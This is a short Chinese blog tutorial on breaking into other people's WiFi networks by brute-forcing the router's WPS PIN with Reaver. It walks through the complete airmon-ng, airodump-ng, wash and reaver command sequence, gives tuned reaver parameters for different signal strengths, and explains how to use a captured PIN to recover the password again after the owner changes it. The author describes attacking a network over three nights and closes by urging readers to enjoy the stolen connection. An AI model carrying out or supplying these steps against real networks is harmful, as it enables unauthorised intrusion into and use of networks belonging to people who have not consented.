前言

前段時(shí)間寫了一篇如何用airceack-ng獲取握手包從而破解wifi密碼的文章。一般來說只要有耐心，都能截獲握手包。但獲取密碼的最后一步跑cap包十分耗時(shí)，而且如果字典不夠大，經(jīng)常跑不出來。而且一旦wifi管理員更改密碼，又要重新來一遍。今天介紹的方法依舊非常耗時(shí)，但是好在一定能獲得密碼，并且wifi管理員更改密碼，很快可以重新獲得更改后的密碼。

背景

讓我們簡單了解一下Reaver的工作原理。它利用了WiFi保護(hù)設(shè)置（WiFi Protected Setup - 下文中簡稱為WPS）的一個(gè)弱點(diǎn)，WPS是許多路由器上都有的一個(gè)功能，可以為用戶提供簡單的配置過程，它與設(shè)備中硬編碼保存的一個(gè)PIN碼綁定在一起。Reaver利用的就是PIN碼的一個(gè)缺陷，最終的結(jié)果就是，只要有足夠的時(shí)間，它就能破解WPA或WPA2的密碼。當(dāng)然，很多路由器支持PIN碼的修改，但是絕大多數(shù)人并不會(huì)這么做。

過程

關(guān)閉進(jìn)程

部分進(jìn)程可能影響到后續(xù)的操作。

airmon-ng check kill

開啟網(wǎng)卡

airmon-ng start wlan1

查看ap信號(hào)強(qiáng)度

破解的wifi當(dāng)然要選信號(hào)強(qiáng)的，這樣的wifi破解速度更快，用起來也更好。

airodump-ng wlan1mon

1.png

查看支持wps的ap

wash -i wlan1mon -C

2.png

reaver

應(yīng)因狀況調(diào)整參數(shù)：MAC即BSSID的值，-c后面的數(shù)字是CH的值。

目標(biāo)信號(hào)非常好:

reaver -i wlan1mon -b MAC -a -S -vv -d0 -c 1

目標(biāo)信號(hào)普通:

reaver -i wlan1mon -b MAC -a -S -vv -d2 -t 5 -c 1

目標(biāo)信號(hào)一般:

reaver -i wlan1mon -b MAC -a -S -vv -d5 -c 1

3.png

然后就是長時(shí)間的等待。像圖中這種每十次就要等待60s，等待的時(shí)間長一點(diǎn)，但是一定能得到結(jié)果。像這個(gè)wifi我破解了三個(gè)晚上。白天該干啥干啥，晚上睡前攻擊wifi。而且reaver可以隨時(shí)停止，它自己會(huì)保存進(jìn)度。

4.png

最終你就能得到wifi的PIN碼以及密碼。把這兩個(gè)記下來，一般來說wifi主人過段時(shí)間就會(huì)更改密碼但不會(huì)更改PIN碼，這時(shí)我們只要加上 -p 命令，WiFi密碼秒出。
愉快的享受wifi吧！